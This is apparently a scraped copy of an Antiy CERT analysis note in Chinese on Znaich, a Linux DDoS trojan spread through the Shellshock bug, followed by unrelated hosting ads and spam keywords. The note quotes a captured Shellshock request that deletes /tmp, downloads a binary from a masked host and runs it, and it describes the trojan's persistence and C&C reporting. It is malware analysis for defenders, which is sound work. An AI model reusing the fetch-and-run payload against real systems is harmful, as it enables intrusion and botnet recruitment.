Trojan[DDOS]/Linux.

pastebin.com  时间:2021-04-05  阅读:()
Znaich分析笔记安天安全研究与应急处理中心(AntiyCERT)Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页目录编者按.
11概述.
12感染源.
13样本分析.
34总结.
7附录一:参考资料.
7附录二:关于安天.
7Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第1页编者按安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料.
1概述安天CERT关注到近期针对Linux平台的木马十分活跃.
2015年1月13日,MalwareMustDie的日本工作人员HendrikAdrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告.
有趣的是,同是在1月14日,HendrikAdrian发推表示XOR.
DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是"新型木马",Avast的报告中也说明了XOR.
DDoS自2014年9月末就已经出现,因此可以得出"新型木马的结论"声音并没有对此事件进行深入研究.
从各方报告来看,1月13日出现的样本与1月14日出现的XOR.
DDoS样本没有关联,下面对1月13日出现的样本进行分析.
2感染源该恶意代码在2015年1月13日被发现,通过"破壳"漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:[13/Jan/2015:06:07:18+0100]"GET/HTTP/1.
1"200311bin/bash-c\"rm-rf/tmp/*;echowgethttp://xxxx:81/9521-O/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echoechoByChina.
Z>>/tmp/Run.
sh;echochmod777/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echo/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echorm-rf/tmp/Run.
sh>>/tmp/Run.
sh;chmod777/tmp/Run.
sh;/tmp/Run.
sh\""它利用"破壳"漏洞下载文件至/tmp文件夹中,通过sh脚本运行.
在2015年1月14日MalwareMustDie的报告中,该C&C服务器包含9521及ck.
exe两个文件:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页而在1月16日下午13:19:49秒时,文件已经被替换:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第3页从截图上看,有359人下载了名为9521的恶意代码.
而另一个名为ck.
exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播.
3样本分析首先分析样本ck.
exe:原始文件名ck.
exeMD54E337BE817E4A667FA695E7980B8B851处理器架构X86-32文件大小1.
7MB(1816064bytes)文件格式BinExecute/Microsoft:EXE[:X86]时间戳2014-11-0804:09:02数字签名NO加壳类型无编译语言MicrosoftVisualC++VT首次上传时间2015-01-1308:05:48VT检测结果5/57病毒名称Trojan/Linux.
ShellShock判定结果恶意Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第4页1、运行后会弹出帮助可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址.
2、对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有"破壳"漏洞的机器,下载恶意代码并运行下面分析载荷文件9521:原始文件名9521MD5B7E3CA05806AA99CAD9D3768FF90F1D9处理器架构X86-32文件大小604.
4KB(618948bytes)文件格式BinExecute/ELF[:X86]数字签名NO加壳类型无VT首次上传时间2015-01-1306:04:59VT检测结果17/55病毒名称Trojan[DDOS]/Linux.
Znaich判定结果恶意1、样本运行后首先获取系统信息,包括系统版本(通过调用uname())系统时间(调用gettimeofday())Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第5页CPU核心数量及时钟频率(取自/proc/cpuinfo)CPU负载(取自/proc/stat)空闲内存大小及内存总量(取自/proc/meminfo)2、修改rc.
local(利用sed命令):删除末尾的exit0在第二行增加字符串"//ChinaZ"3、解密硬编码的C&C服务器地址Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第6页4、与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送5、使用Keep-alive机制检测C&C服务器是否存活Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第7页4总结该样本通过"破壳"漏洞进行传播,为常见的DDOS攻击样本.
但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用"破壳"漏洞进行攻击.
附录一:参考资料[1]来源:MalwareMustDiehttp://blog.
malwaremustdie.
org/2015/01/mmd-0030-2015-new-elf-malware-on.
htmlhttp://pastebin.
com/raw.
phpi=gf4xrB9n[2]来源:KernerMode.
infohttp://www.
kernelmode.
info/forum/viewtopic.
phpf=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e附录二:关于安天安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业.
安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局.
安天的监控预警能力覆盖全国、产品与服务辐射多个国家.
安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期.
结Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第8页合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案.
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护.
安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品.
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一.
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案.
关于反病毒引擎更多信息请访问:http://www.
antiy.
com(中文)http://www.
antiy.
net(英文)安天企业安全公司更多信息请访问:http://www.
antiy.
cn安天移动安全公司(AVLTEAM)更多信息请访问:http://www.
avlsec.
com

器安装环境和运维管理工具推荐

今天看到一个网友从原来虚拟主机准备转移至服务器管理自己的业务。这里问到虚拟主机和服务器到底有什么不同,需要用到哪些工具软件。那准备在下班之间稍微摸鱼一下整理我们服务器安装环境和运维管理中常见需要用到的软件工具推荐。第一、系统镜像软件一般来说,我们云服务器或者独立服务器都是有自带镜像的。我们只需要选择镜像安装就可以,比如有 Windows和Linux。但是有些时候我们可能需要自定义镜像的高级玩法,这...

Hostigger不限流量VPS年20美元

Hostigger 主机商在前面的文章中也有介绍过几次,这个商家运营时间是有一些年份,只不过在我们圈内好像之前出现的次数不多。最近这段时间商家有提供不限流量的VPS主机,逐渐的慢慢被人认识到。在前面的介绍到他们提供的机房还是比较多的,比如土耳其、美国等。今天看到Hostigger 商家居然改动挺大的,原来蛮好的域名居然这次连带官方域名都更换掉去掉一个G(Hostiger )。估摸着这个域名也是之前...

美国cera机房 2核4G 19.9元/月 宿主机 E5 2696v2x2 512G

美国特价云服务器 2核4G 19.9元杭州王小玉网络科技有限公司成立于2020是拥有IDC ISP资质的正规公司,这次推荐的美国云服务器也是商家主打产品,有点在于稳定 速度 数据安全。企业级数据安全保障,支持异地灾备,数据安全系数达到了100%安全级别,是国内唯一一家美国云服务器拥有这个安全级别的商家。E5 2696v2x2 2核 4G内存 20G系统盘 10G数据盘 20M带宽 100G流量 1...

pastebin.com为你推荐
著作权登记著作权登记具有什么法律效力?小度商城小度在家智能屏Air性价比高吗?懂行的进~今日油条油条每周最多能吃多少access数据库access数据库主要学什么老虎数码1200万相素的数码相机都有哪些款?大概价钱是多少?haole018.com为啥进WWWhaole001)COM怎么提示域名出错?囡道是haole001换地了吗www.haole012.comhttp://fj.qq.com/news/wm/wm012.htm 这个链接的视频的 第3分20秒开始的 背景音乐 是什么?99nets.com99nets网游模拟娱乐社区怎么打不开了?????????谁能告诉我 ???、m88.comm88.com现在的官方网址是哪个啊 ?m88.com分析软件?www.03024.comwww.sohu.com是什么
godaddy优惠码 优key 鲜果阅读 火车票抢票攻略 万网优惠券 新天域互联 免费个人空间 泉州电信 vip购优惠 hdd 双线asp空间 国外在线代理服务器 游戏服务器出租 贵阳电信 空间服务器 杭州电信宽带 乐视会员免费领取 新疆服务器 google搜索打不开 镇江高防服务器 更多